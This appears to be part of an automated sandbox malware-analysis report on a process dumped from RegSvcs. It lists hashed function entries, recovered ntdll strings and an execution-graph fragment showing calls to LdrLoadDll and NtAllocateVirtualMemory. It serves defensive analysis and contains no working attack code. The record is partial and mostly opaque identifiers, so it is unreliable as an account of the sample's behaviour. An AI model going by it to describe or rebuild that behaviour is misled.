                                                                                                                              • Instruction Fuzzy Hash: 00900225221401020145B5580A4454B0449A7EA351395C016F1417591CC73189655731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                                                                                              • Instruction ID: bdc437eb78cc0bfae9a3405a537f0750a95a58de04202a52ede27aeb44e4a9fd
                                                                                                                              • Opcode Fuzzy Hash: 623ea991c5f93ce60aa70185ccfd9991167079209f7964b262a7fbf5968e92ff
                                                                                                                              • Instruction Fuzzy Hash: 8F9002A1201541924500B2588844B4A450997F4201B55C017E1055561CC63589519635
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                                                                                              • Instruction ID: a861611995e416999033f51c7465c88bf1a172c6b122e174d2058bed0959c215
                                                                                                                              • Opcode Fuzzy Hash: 54c484ffd3827b870396aaf9cf4b6d37396e0ba1f18ca615f6990e52614d7169
                                                                                                                              • Instruction Fuzzy Hash: CE90022120544542D10075585848A46000997E4205F55D012A1065596DC7358951A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                                                                                              • Instruction ID: ebf8b2fe2f466b96026e320bfe7601e215b1961f583f9fd80b9a031ad0500390
                                                                                                                              • Opcode Fuzzy Hash: a4f352caba151455307541de580561fecc0afdbfa80e76477a8d9629da81c653
                                                                                                                              • Instruction Fuzzy Hash: 3990022921340102D1807158584864A000997E5202F95D416A0016559CCA2589695731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                                                                                              • Instruction ID: 388da0fe915abba47e3b3910c3f6187c7e0f55c71ec8d69d02fb82637fd4e42c
                                                                                                                              • Opcode Fuzzy Hash: 897893fe494610374441ef728bfd4e8519e9b9c2d2c5fdb581dd0f709a869a0f
                                                                                                                              • Instruction Fuzzy Hash: 8690022160140602D10171584844656000E97E4241F95C023A1025556ECB358A92A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
                                                                                                                              • Instruction ID: d3f9c2a0fdab093dd65488b22c783c7cb09acb50179200147a1f3179c9539f5c
                                                                                                                              • Opcode Fuzzy Hash: f2982cc54c820de80a7d80db0399477d896b7c71a296c2c6ee151dacc6875e09
                                                                                                                              • Instruction Fuzzy Hash: 0590027120140502D14071584844786000997E4301F55C012A5065555EC7698ED56B75
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                                                                                              • Instruction ID: 9a0548f45d566d2b91ca738c65ec96a6f6e88ccd87f7bfdaf0ca6e6961cdf6f7
                                                                                                                              • Opcode Fuzzy Hash: 532ab42fba43ab1193ca036fbe6759ec43b211607051630e721fecda57f1c95e
                                                                                                                              • Instruction Fuzzy Hash: 0790022120184542D14072584C44B4F410997F5202F95C01AA4157555CCA2589555B31
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                                                                                              • Instruction ID: a2ef11c06812a93a0c4ce2fa1d5c267da7fc71d595dfd780ebc7be383de3bea8
                                                                                                                              • Opcode Fuzzy Hash: ff6833b2307028185fa2f55569a0801c19816f0aeea11482fef36410e803ea4d
                                                                                                                              • Instruction Fuzzy Hash: 0690022124140902D14071588854747000AD7E4601F55C012A0025555DC7268A656BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                                                                                              • Instruction ID: b6113a824cabe951f7dbffba76175c3538f116e5db79ac34faecae1f67b3fd7e
                                                                                                                              • Opcode Fuzzy Hash: 163b97b2b019797cb52c5f992741b999a083af54a620c8ffe3ee12ed83a3d618
                                                                                                                              • Instruction Fuzzy Hash: B690022124545202D150715C48446564009B7F4201F55C022A0815595DC66589556731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b8c8071b157a6e2dbee54599818c545ad6c33a6cac58a5184f19136d014465af
                                                                                                                              • Instruction ID: 34c1ba37472a43ba141b1a7ef5229eefead231d2ef0a91e6c1d6870dd85a10f8
                                                                                                                              • Opcode Fuzzy Hash: b8c8071b157a6e2dbee54599818c545ad6c33a6cac58a5184f19136d014465af
                                                                                                                              • Instruction Fuzzy Hash: 8D90023520140502D51071585C44686004A97E4301F55D412A0425559DC76489A1A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21772f7dcbc873dfaab6a23c3509552f6e504e1012c7cfeb84559d133f1051bd
                                                                                                                              • Instruction ID: b52ea55d1583ce5358fd2e701e8fdd19af4d8127041cb5a6cec5211e9f838ec9
                                                                                                                              • Opcode Fuzzy Hash: 21772f7dcbc873dfaab6a23c3509552f6e504e1012c7cfeb84559d133f1051bd
                                                                                                                              • Instruction Fuzzy Hash: 9590023120240242954072585C44A8E410997F5302B95D416A0016555CCA2489615731
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: a2b4e27ef477884cdf914af3e1defc8872726b59b345827ea3a3634443c29430
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Uniqueness

Uniqueness Score: -1.00%

Strings
• Execute=1, xrefs: 014D4713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 014D4655
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014D46FC
• ExecuteOptions, xrefs: 014D46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 014D4725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 014D4787
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 014D4742
Memory Dump Source
• Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
Uniqueness

Uniqueness Score: -1.00%


                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: 923cf12ae9efa7531cb3b2e363759f1b38e22c469a27cdc2ae4d714ca512a77d
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 8E81CF74E052498EEF258E6CC8907FEBFB1EF65320F9A421FD865A73A1C77088418B51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                                                                                              • Instruction ID: 08e334d1712671662bfb4fee34566518e3a0ecd0156483ef53ee26c3461863a7
                                                                                                                              • Opcode Fuzzy Hash: 863252eeebdc77287db545d8c64a826e80f1941fc6447beb62385360423d499b
                                                                                                                              • Instruction Fuzzy Hash: 6121657AE00119ABEB11DF79DC40AEEBBF9FF64650F55011AE905E7205E730D9018BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014D02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014D02BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                                                                                              • Instruction ID: 40d832e4bdc82dd54d7acb402d48a98251a82c5184a1f748a25ba4b341b63b00
                                                                                                                              • Opcode Fuzzy Hash: d2901e8db2a4cc80c76c4061776e6239edd8ee7a2620167fd1e07704b048d9b7
                                                                                                                              • Instruction Fuzzy Hash: 47E1AE306047419FEB25EF28C894B2ABBE0BB94314F140A1EF5A59B3F1D774D94ACB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 014D7B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 014D7B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D7BAC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: dc0fed8fe004c51f5464cb9ba4a479fe692b7e1b806b735a8d79f6f4b7d660a4
                                                                                                                              • Instruction ID: 64b5f2709c0da44d449f6512800f89b8b023c0f6d92d074e4efc19103be2fa9c
                                                                                                                              • Opcode Fuzzy Hash: dc0fed8fe004c51f5464cb9ba4a479fe692b7e1b806b735a8d79f6f4b7d660a4
                                                                                                                              • Instruction Fuzzy Hash: 9341D3313007029BDB20DE29D850F6BBBE5EB98715F100A1FE956DB7A0DB71E8058B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014D728C
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 014D7294
                                                                                                                              • RTL: Resource at %p, xrefs: 014D72A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 014D72C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                                                                                              • Instruction ID: 71d3fd69455e73249e7976e36cd806d5712e219e6c0d196c36404fbc18680974
                                                                                                                              • Opcode Fuzzy Hash: 0e80492b66e8d8def4cda4d2cad81336b7e9d1be75971ca97b4ccd1330600b8b
                                                                                                                              • Instruction Fuzzy Hash: CA41E131600242ABDB21DF29DC41F6ABBA5FBA4715F10062FF955AB360DB31F81687D1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                                                                                              • Instruction ID: e214209e07a30a5325632924ce7421578364effcc35c6ebd8fa4a372d8a06342
                                                                                                                              • Opcode Fuzzy Hash: bd76e3f2cba962ecd48bdf1e8c292bb225366d852373681929569bc901e07c24
                                                                                                                              • Instruction Fuzzy Hash: 8A318672A002199FDB21DF2DCC40BEEB7F8FB54650F95455AE949E7204EB30EA548BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: e87cd1599d464c4784e9cc9a06c035b6b58d5a9a174862ef313c33916cf4d104
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9F91C470E002069AEF34CF6DC8906BFBBA5EF64322F96451BF955A73E0D7328A418750
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                                                                                              • Instruction ID: a7170047f3e59c477012b1ad0b914311e9f7f6a4dfee6ebf2f2e477aa9a63057
                                                                                                                              • Opcode Fuzzy Hash: e2ebbe01d13f050b94f3e5bc1ba1681ba67e40acbaf8dd72d794407fe656ff9d
                                                                                                                              • Instruction Fuzzy Hash: 9D813C75D00269DBDB31CB54CC44BEEBAB8AB18714F0441EBEA19B7250D7B09E85CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 014ECFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4rw@4rw
                                                                                                                              • API String ID: 4062629308-2979693914
                                                                                                                              • Opcode ID: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                                                                                              • Instruction ID: c91ef5d3ff6a5d5e26fc42608a9efff9e5272a269eb60e1b09c536c0606dfc06
                                                                                                                              • Opcode Fuzzy Hash: 7c7dcda6381686ca62b411e0ab726d7dbd1b8e080d1767dd2ecc90a483f84f02
                                                                                                                              • Instruction Fuzzy Hash: 5C419AB1D00215DFDB219FAAC894AAEBBF8FF65B54F04402FE914DB264E7708801DB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3%
                                                                                                                              Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                              Signature Coverage:3%
                                                                                                                              Total number of Nodes:930
                                                                                                                              Total number of Limit Nodes:118
2a51edd 96180->96181 96182 2a50c00 LdrLoadDll 96181->96182 96183 2a51efc 96182->96183 96184 2a50c00 LdrLoadDll 96183->96184 96185 2a51f18 96184->96185 96186 2a50c00 LdrLoadDll 96185->96186 96186->96164 96187->96124 96189 2a49376 96188->96189 96209 2a4c8c0 96189->96209 96191 2a493dd 96193 2a49560 96191->96193 96195 2a493fb 96191->96195 96192 2a49545 96192->96126 96193->96192 96194 2a49220 3 API calls 96193->96194 96194->96193 96195->96192 96214 2a49220 96195->96214 96198 2a496d6 96197->96198 96199 2a4c8c0 2 API calls 96198->96199 96200 2a49752 96199->96200 96200->96128 96202 2a441e4 96201->96202 96203 2a441eb 96202->96203 96204 2a44220 LdrLoadDll 96202->96204 96203->96155 96205 2a51880 LdrLoadDll 96203->96205 96204->96203 96205->96155 96206->96165 96207->96168 96208->96171 96211 2a4c8d6 96209->96211 96210 2a4c8e3 96210->96191 96211->96210 96212 2a57050 2 API calls 96211->96212 96213 2a4c914 96212->96213 96213->96191 96215 2a49236 96214->96215 96218 2a4cdb0 96215->96218 96217 2a4933e 96217->96195 96219 2a4cded 96218->96219 96220 2a4ce9d 96219->96220 96222 2a4ce40 96219->96222 96225 2a4deb0 96219->96225 96220->96217 96223 2a4ce79 96222->96223 96224 2a57050 2 API calls 96222->96224 96223->96217 96224->96223 96227 2a4dec4 96225->96227 96228 2a4dbb0 96225->96228 96227->96222 96229 2a4dbd6 96228->96229 96232 2a4dbf9 96229->96232 96241 2a56fc0 96229->96241 96231 2a4dea1 96231->96227 96232->96231 96233 2a444a0 LdrLoadDll 96232->96233 96240 2a4dcea 96232->96240 96234 2a4dd66 96233->96234 96235 2a444a0 LdrLoadDll 96234->96235 96235->96240 96236 2a4de83 96238 2a57050 2 API calls 96236->96238 96239 2a4de93 96238->96239 96239->96227 96240->96231 96240->96236 96244 2a3b610 96240->96244 96247 2a55370 96241->96247 96243 2a56ff1 96243->96232 96245 2a56fc0 2 API calls 96244->96245 96246 2a3cc81 96244->96246 96245->96246 96246->96236 96248 2a55391 96247->96248 96249 2a553d3 96247->96249 96250 2a56230 LdrLoadDll 96248->96250 96251 2a56230 LdrLoadDll 96249->96251 96252 2a553ab 
96250->96252 96253 2a553e9 NtAllocateVirtualMemory 96251->96253 96252->96243 96253->96243 96254 2a550a0 96255 2a550bd 96254->96255 96256 2a56230 LdrLoadDll 96255->96256 96257 2a550ce 96256->96257 96260 4ab2af0 LdrInitializeThunk 96257->96260 96258 2a550f9 96260->96258 96261 2a4256c 96262 2a425ab 96261->96262 96264 2a42573 96261->96264 96266 2a425d3 96262->96266 96267 2a45cc0 96262->96267 96265 2a441c0 LdrLoadDll 96264->96265 96265->96262 96268 2a45cf3 96267->96268 96278 2a54de0 96268->96278 96270 2a45d17 96270->96266 96275 2a55240 2 API calls 96277 2a45dbc 96275->96277 96276 2a45d52 96276->96275 96277->96266 96279 2a54dfd 96278->96279 96280 2a56230 LdrLoadDll 96279->96280 96281 2a45d10 96280->96281 96281->96270 96282 2a54e30 96281->96282 96283 2a54e4d 96282->96283 96284 2a56230 LdrLoadDll 96283->96284 96285 2a54e5e 96284->96285 96292 4ab2ca0 LdrInitializeThunk 96285->96292 96286 2a45d3a 96286->96270 96288 2a55740 96286->96288 96289 2a5575a 96288->96289 96290 2a56230 LdrLoadDll 96289->96290 96291 2a5576b 96290->96291 96291->96276 96292->96286 96295 2a507f5 96296 2a507ba 96295->96296 96297 2a55240 2 API calls 96296->96297 96298 2a507c1 96297->96298 96301 2a57170 96298->96301 96300 2a507cc 96302 2a55500 2 API calls 96301->96302 96303 2a5718d 96302->96303 96303->96300 96304 2a399b0 96306 2a39df8 96304->96306 96307 2a3a242 96306->96307 96308 2a56ce0 96306->96308 96309 2a56d06 96308->96309 96316 2a430f0 96309->96316 96311 2a56d12 96312 2a56d40 96311->96312 96319 2a53570 96311->96319 96323 2a555a0 LdrLoadDll 96312->96323 96315 2a56d51 96315->96307 96318 2a430fd 96316->96318 96324 2a43040 96316->96324 96318->96311 96320 2a535ca 96319->96320 96322 2a535d7 96320->96322 96358 2a41fb0 96320->96358 96322->96312 96323->96315 96331 2a520c0 96324->96331 96328 2a43063 96330 2a43070 96328->96330 96338 2a55bc0 96328->96338 96330->96318 96332 2a520cf 96331->96332 96333 2a50c00 LdrLoadDll 96332->96333 96334 2a43057 96333->96334 96335 2a52110 96334->96335 96345 2a554b0 96335->96345 
